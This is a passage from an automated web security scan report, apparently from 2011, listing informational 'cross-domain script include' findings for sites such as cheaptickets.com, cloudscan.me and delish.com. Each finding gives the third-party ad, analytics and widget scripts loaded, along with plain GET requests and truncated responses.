<div id="special-sections"><script type="text/javascript" language="Javascript1.1" src="http://ad.doubleclick.net/adj/cmiss.dart/groups_parent;dcopt=ist;ap1=0;ap2=0;ap3=0;a0_0=0;a0_4=0;a0_7=0;a0_10=0;a1_0=0;a1_7=0;a2=0;a3=0;a4=0;a5=0;a6=0;a7=0;a9=0;a11=0;a13=0;a15=0;a18=0;spon=0;sens=0;m=0;mage=0;area=groups;gcat=parent;gid=416;2omk=;tier=home;sz=160x112;tile=4;ord=990903479?"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script src="http://content.dl-rms.com/rms/mother/11982/nodetag.js"></script>
...[SNIP]...

18.406. http://www.cheaptickets.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cheaptickets.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext4&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext5&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&dest=LAS&height=1&rotator=module&width=1&adType=noframe&pos=1&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&dest=LAS&height=1&rotator=module&width=1&adType=noframe&pos=2&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&dest=LAS&height=1&rotator=module&width=1&adType=noframe&pos=3&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&dest=LAS&height=1&rotator=module&width=1&adType=noframe&pos=4&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&dest=LAS&height=150&rotator=module&width=519&adType=noframe&pos=middle&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x300&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&dest=LAS&height=300&rotator=module&width=519&adType=noframe&pos=middle&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&dest=LAS&height=90&rotator=module&width=728&adType=noframe&pos=middle&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&dest=LAS&height=90&rotator=module&width=728&adType=noframe&pos=middle&

Request

GET / HTTP/1.1
Host: www.cheaptickets.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=41A0C8377E063EDF9406ACA3829AA4EF; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: anon=6141560721296661466911; Domain=.cheaptickets.com; Expires=Tue, 28-Jan-2031 15:44:26 GMT; Path=/
Set-Cookie: OrbitzRegistration="N,0,0,0"; Domain=.cheaptickets.com; Expires=Tue, 28-Jan-2031 15:44:26 GMT; Path=/
Set-Cookie: BetaGroup="02/02/2011 09:44:26|A|A|N|C|N|H|B|P|N"; Domain=.cheaptickets.com; Expires=Wed, 16-Feb-2011 15:44:26 GMT; Path=/
Set-Cookie: logging=41A0C8377E063EDF9406ACA3829AA4EF|egapp12p|; Domain=.cheaptickets.com; Path=/
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:44:26 GMT
Set-Cookie: NSC_JOgil22jbs5zdatbqdhwzldyh4ibbdt=ffffffff09e3a73b45525d5f4f58455e445a4a4217b9;path=/
Set-Cookie: NSC_xxx.difbqujdlfut.dpn.80_gxe=ffffffff09e3087845525d5f4f58455e445a4a423660;path=/
Content-Length: 268072


...[SNIP]...

<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&dest=LAS&height=90&rotator=module&width=728&adType=noframe&pos=middle&"></script>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad hotelTelesalesAd">


                           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&"></script>
...[SNIP]...

<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x300&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&dest=LAS&height=300&rotator=module&width=519&adType=noframe&pos=middle&"></script>
...[SNIP]...

<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&dest=LAS&height=150&rotator=module&width=519&adType=noframe&pos=middle&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext4&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext5&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&"></script>
...[SNIP]...

<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&dest=LAS&height=90&rotator=module&width=728&adType=noframe&pos=middle&"></script>
...[SNIP]...

<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&dest=LAS&height=1&rotator=module&width=1&adType=noframe&pos=1&"></script>
...[SNIP]...

<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&dest=LAS&height=1&rotator=module&width=1&adType=noframe&pos=2&"></script>
...[SNIP]...

<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&dest=LAS&height=1&rotator=module&width=1&adType=noframe&pos=3&"></script>
...[SNIP]...

<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=ctix&subdomain=ctix&group=A&tile=1296661466927&dsrc=7&dest=LAS&height=1&rotator=module&width=1&adType=noframe&pos=4&"></script>
...[SNIP]...

18.407. http://www.cloudscan.me/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudscan.me
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com
http://www.blogger.com/static/v1/widgets/283664639-widgets.js
http://www.google.com/jsapi
http://www.google.com/uds/solutions/slideshow/gfslideshow.js

Request

GET / HTTP/1.1
Host: www.cloudscan.me
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 04:07:16 GMT
Date: Thu, 03 Feb 2011 04:07:16 GMT
Cache-Control: public, max-age=0, must-revalidate, proxy-revalidate
Last-Modified: Thu, 03 Feb 2011 02:05:45 GMT
ETag: "39f08f97-e292-46bc-8bca-ec60a9e8d8ef"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE html>
<html b:version='2' class='v2' dir='ltr'>
<head>
<meta content='IE=EmulateIE7' http-equiv='X-UA-Compatible'/>
<meta content='width=1100' name='viewport'/>
<meta content='text/html; cha
...[SNIP]...

<script type='text/javascript' src='http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com'></script>
...[SNIP]...
</div>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/283664639-widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
<script type="text/javascript" src="http://www.google.com/uds/solutions/slideshow/gfslideshow.js"></script>
...[SNIP]...

18.408. http://www.cloudscan.me/2010/09/vendor-ip-board-software-version-312.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudscan.me
Path:	/2010/09/vendor-ip-board-software-version-312.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com
http://www.blogger.com/static/v1/jsbin/1053706714-comment_from_post_iframe.js
http://www.blogger.com/static/v1/widgets/283664639-widgets.js
http://www.google.com/jsapi
http://www.google.com/uds/solutions/slideshow/gfslideshow.js

Request

GET /2010/09/vendor-ip-board-software-version-312.html HTTP/1.1
Host: www.cloudscan.me
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 04:07:13 GMT
Date: Thu, 03 Feb 2011 04:07:13 GMT
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Last-Modified: Thu, 03 Feb 2011 02:05:45 GMT
ETag: "39f08f97-e292-46bc-8bca-ec60a9e8d8ef"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE html>
<html b:version='2' class='v2' dir='ltr'>
<head>
<meta content='IE=EmulateIE7' http-equiv='X-UA-Compatible'/>
<meta content='width=1100' name='viewport'/>
<meta content='text/html; cha
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.blogger.com/static/v1/jsbin/1053706714-comment_from_post_iframe.js"></script>
...[SNIP]...

<script type='text/javascript' src='http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com'></script>
...[SNIP]...
</div>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/283664639-widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
<script type="text/javascript" src="http://www.google.com/uds/solutions/slideshow/gfslideshow.js"></script>
...[SNIP]...

18.409. http://www.cloudscan.me/2010/12/doubleclicknet-ad-cdn-http-header.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudscan.me
Path:	/2010/12/doubleclicknet-ad-cdn-http-header.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com
http://www.blogger.com/static/v1/jsbin/1053706714-comment_from_post_iframe.js
http://www.blogger.com/static/v1/widgets/283664639-widgets.js
http://www.google.com/jsapi
http://www.google.com/uds/solutions/slideshow/gfslideshow.js

Request

GET /2010/12/doubleclicknet-ad-cdn-http-header.html HTTP/1.1
Host: www.cloudscan.me
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: blogger_TID=cad8590fabb213e; HttpOnly
Expires: Thu, 03 Feb 2011 04:07:15 GMT
Date: Thu, 03 Feb 2011 04:07:15 GMT
Cache-Control: private
Last-Modified: Thu, 03 Feb 2011 02:05:45 GMT
ETag: "39f08f97-e292-46bc-8bca-ec60a9e8d8ef"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE html>
<html b:version='2' class='v2' dir='ltr'>
<head>
<meta content='IE=EmulateIE7' http-equiv='X-UA-Compatible'/>
<meta content='width=1100' name='viewport'/>
<meta content='text/html; cha
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.blogger.com/static/v1/jsbin/1053706714-comment_from_post_iframe.js"></script>
...[SNIP]...

<script type='text/javascript' src='http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com'></script>
...[SNIP]...
</div>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/283664639-widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
<script type="text/javascript" src="http://www.google.com/uds/solutions/slideshow/gfslideshow.js"></script>
...[SNIP]...

18.410. http://www.datingfreesite.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.datingfreesite.net
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.statcounter.com/counter/counter.js

Request

GET / HTTP/1.1
Host: www.datingfreesite.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 04:19:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.o
...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>

<script type="text/javascript"
src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...

18.411. http://www.delish.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.delish.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://analytics.live.com/Analytics/wlAnalytics.js
http://blstj.msn.com/br/gbl/js/2/report.js
http://blstj.msn.com/br/gbl/js/4/mozcompat.js
http://blstj.msn.com/br/gbl/js/7/core.js
http://cdn.krxd.net/krux.js
http://images.video.msn.com/js/ch/channels.js
http://w.sharethis.com/button/sharethis.js;onmouseover=false

Request

GET / HTTP/1.1
Host: www.delish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 87006
Content-Type: text/html
Cache-Control: max-age=502
Date: Wed, 02 Feb 2011 15:44:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>

<script language="javascript" src="http://images.video.msn.com/js/ch/channels.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d63a4976-501a-446d-81e6-434d03d8388c&type=website&buttonText=&embeds=true&post_services=facebook%2Ctwitter%2Cdelicious%2Cstumbleupon%2Cmyspace%2Cdigg%2Creddit%2Cblogger%2Cwordpress%2Ctypepad%2Cgoogle_bmarks%2Cwindows_live%2Cfark%2Cbus_exchange%2Cpropeller%2Cnewsvine%2Clinkedin%2Ctechnorati%2Cmixx%2Cybuzz%2Cfriendfeed&linkfg=%23668c1f&offsetLeft=-180;onmouseover=false"></script>
...[SNIP]...

<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/2/report.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://analytics.live.com/Analytics/wlAnalytics.js"></script>
...[SNIP]...
</script>
<script src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...

18.412. http://www.delish.com/entertaining-ideas/party-ideas/valentines-day-romantic-recipes-tips previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.delish.com
Path:	/entertaining-ideas/party-ideas/valentines-day-romantic-recipes-tips

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://analytics.live.com/Analytics/wlAnalytics.js
http://blstj.msn.com/br/gbl/js/2/report.js
http://blstj.msn.com/br/gbl/js/4/mozcompat.js
http://blstj.msn.com/br/gbl/js/7/core.js
http://cdn.krxd.net/krux.js
http://images.video.msn.com/js/ch/channels.js
http://w.sharethis.com/button/sharethis.js;onmouseover=false

Request

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 109875
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=490
Date: Wed, 02 Feb 2011 15:44:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>

<script language="javascript" src="http://images.video.msn.com/js/ch/channels.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d63a4976-501a-446d-81e6-434d03d8388c&type=website&buttonText=&embeds=true&post_services=facebook%2Ctwitter%2Cdelicious%2Cstumbleupon%2Cmyspace%2Cdigg%2Creddit%2Cblogger%2Cwordpress%2Ctypepad%2Cgoogle_bmarks%2Cwindows_live%2Cfark%2Cbus_exchange%2Cpropeller%2Cnewsvine%2Clinkedin%2Ctechnorati%2Cmixx%2Cybuzz%2Cfriendfeed&linkfg=%23668c1f&offsetLeft=-180;onmouseover=false"></script>
...[SNIP]...

<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/2/report.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://analytics.live.com/Analytics/wlAnalytics.js"></script>
...[SNIP]...
</script>
<script src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...

18.413. http://www.demandstudios.com/ehow-writers.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.demandstudios.com
Path:	/ehow-writers.html

Issue detail

The response dynamically includes the following scripts from other domains:

https://edge.quantserve.com/quant.js
https://s7.addthis.com/js/250/addthis_widget.js
https://vs.dmtracker.com/tags/vs.js

Request

GET /ehow-writers.html HTTP/1.1
Host: www.demandstudios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:44:39 GMT
Server: Microsoft-IIS/6.0
x-server-info: new server
Hostname: sjl01wdsweb01
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Set-Cookie: BIGipServerdemandstudios.com-69.64.153.116-80=613812490.20480.0000; path=/ ; domain=demandstudios.com; path=/
Set-Cookie: ASP.NET_SessionId=rd34yp45uiciisjz3xjl2e45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22419

<!doctype html>
<html lang="en-US">

<head>
   <title>Write for eHow | Demand Media Studios</title>
   <meta charset="UTF-8"/>

   <link href="/ui/images/favicon.ico" rel="shortcut icon" />

   <
...[SNIP]...

                           <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#pub=dmseo"></script>
...[SNIP]...
</noscript>
<script src="https://vs.dmtracker.com/tags/vs.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.414. http://www.digitalia.be/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.digitalia.be
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/ga.js

Request

GET / HTTP/1.1
Host: www.digitalia.be
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: 60gp=R4049230386; path=/; expires=Sat, 05-Feb-2011 16:07:51 GMT
Date: Thu, 03 Feb 2011 04:07:20 GMT
Server: Apache/2.2.X (OVH)
X-Powered-By: PHP/5.3.5
X-UA-Compatible: IE=edge
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 52654

...<!DOCTYPE html>
<html lang="fr">
<head>
   <meta http-equiv="Content-type" content="text/html;charset=UTF-8" />
   <title>digitalia.be</title>
   <meta name="DC.Language" content="fr" />
   <meta nam
...[SNIP]...
<link rel="search" type="application/opensearchdescription+xml" title="Recherche sur digitalia.be" href="/opensearch.xml" />
   <script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...
<p><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

18.415. http://www.dillerdesign.com/experiment/DD_belatedPNG/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dillerdesign.com
Path:	/experiment/DD_belatedPNG/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /experiment/DD_belatedPNG/ HTTP/1.1
Host: www.dillerdesign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:44:39 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.16
Connection: close
Content-Type: text/html
Content-Length: 30282

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
               <!--
           DD_belatedPNG is free software under the MIT License: http://dillerdes
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="diggbox">
                   <script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...

18.416. http://www.directstartv.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.directstartv.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://assets.percentmobile.com/percent_mobile.js
http://edge.quantserve.com/quant.js
http://www.googleadservices.com/pagead/conversion.js

Request

GET / HTTP/1.1
Host: www.directstartv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.417. http://www.dustindiaz.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dustindiaz.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/anywhere.js?id=napdReg8vmaMotIRoyrg&v=1
http://widgets.twimg.com/j/2/widget.js
http://www.flickr.com/badge_code_v2.gne?count=1&display=latest&size=m&layout=h&source=user&user=38687875%40N00
http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.dustindiaz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 04:07:21 GMT
Server: Apache
X-Pingback: http://www.dustindiaz.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 18824
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang='en'>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<title>Dustin Diaz</title>
<style type="text/css">
@import "/css/960.css
...[SNIP]...
<li><script type="text/javascript" src="http://www.flickr.com/badge_code_v2.gne?count=1&display=latest&size=m&layout=h&source=user&user=38687875%40N00"></script>
...[SNIP]...
</h3>
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
<script type="text/javascript">
...[SNIP]...
</script>
<script src="http://platform.twitter.com/anywhere.js?id=napdReg8vmaMotIRoyrg&v=1"></script>
...[SNIP]...

18.418. http://www.ebookers.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebookers.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js

Request

GET / HTTP/1.1
Host: www.ebookers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.419. http://www.ehow.co.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.co.uk
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=F08747
http://v5-ui.ehowcdn.com/content/compressed/common_footer-e4fa775a.js
http://v5-ui.ehowcdn.com/content/compressed/common_header-130651af.js
http://v5-ui.ehowcdn.com/content/compressed/site-home-b203ab9c.js
http://vs.dmtracker.com/tags/vs.js

Request

GET / HTTP/1.1
Host: www.ehow.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 38413
Content-Type: text/html
Set-Cookie: v=NEW; expires=Fri, 04 Mar 2011 15:44:44 GMT; path=/; domain=www.ehow.co.uk;
ETag: "623bda6490e767bc78c1f5215f97855c:1296179652"
Cache-Control: max-age=9531
Date: Wed, 02 Feb 2011 15:44:44 GMT
Connection: close

<!DOCTYPE html>

<html id="corporate" class="Corporate" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
   <head>
